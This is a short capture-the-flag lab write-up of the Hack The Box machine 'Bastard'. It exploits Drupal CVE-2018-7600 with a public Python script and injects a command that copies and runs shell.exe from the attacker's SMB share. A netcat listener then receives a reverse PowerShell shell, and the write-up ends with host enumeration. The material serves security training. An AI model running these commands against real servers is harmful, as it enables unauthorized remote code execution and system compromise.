InfoSec LAB

Bastard_Exploitation

Created: 2 min read

Exploitation

The target web application is vulnerable to CVE-2018-7600 The Python script will be used to exploit the target web server and to inject OS commands to upload and execute the payload over SMB

┌──(kali㉿kali)-[~/archive/htb/labs/bastard]
└─$ simplesmb . -smb2support           
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Config file parsed
[*] callback added for uuid 4b324fc8-1670-01d3-1278-5a47bf6ee188 v:3.0
[*] callback added for uuid 6bffd098-a112-3610-9833-46c3f87e345a v:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Starting a SMB server on Kali to serve the payload

┌──(kali㉿kali)-[~/…/htb/labs/bastard/CVE-2018-7600]
└─$ python3 drupa7-cve-2018-7600.py http://$IP/ -c "copy \\\\10.10.14.6\\smb\\shell.exe && shell.exe"
 
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================
 
[*] Poisoning a form and including it in cache.
[*] poisoned form id: form-djieVAKKJ-x3gxAubHWb9P4LAVLVr6ZmUhF9Uh-rfzQ
[*] triggering exploit to execute: copy \\10.10.14.6\smb\shell.exe && shell.exe

Executing the Python script

The target host connected to the SMB server and downloaded the payload. The payload will be execute it

┌──(kali㉿kali)-[~/archive/htb/labs/bastard]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.9] 49172
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
ps c:\inetpub\drupal-7.54> whoami
nt authority\iusr
ps c:\inetpub\drupal-7.54> hostname
Bastard
ps c:\inetpub\drupal-7.54> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.9
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{56fec108-3f71-4327-bf45-2b4ee355cd0f}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 
 
tunnel adapter local area connection* 9:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . :

Initial Foothold established as nt authority\iusr by exploiting CVE-2018-7600 on the target web application

Interactive Graph View

Backlinks